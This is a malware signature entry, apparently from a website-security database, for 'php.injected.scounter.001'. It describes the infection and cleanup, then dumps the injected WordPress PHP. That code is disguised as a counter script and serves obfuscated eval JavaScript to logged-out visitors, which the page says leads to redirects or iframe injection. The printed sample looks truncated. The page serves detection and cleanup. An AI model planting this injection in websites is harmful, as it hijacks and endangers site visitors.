Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.injected.scounter.001

php.injected.scounter.001

This malware is crafted to act as a part of a valid counter script for the untrained eye, using a decieving comment: <!--scounter--> and javascript obfuscation to difficult its understanding.
From all payloads found related to php.injected.scounter the most common are conditional redirect and iframe injection.

Affecting

Any website running vulnerable software or hosted on a server with compromised credentials

Cleanup

Inspect your website for any entry of and remove the related code.

Dump


<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return a|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>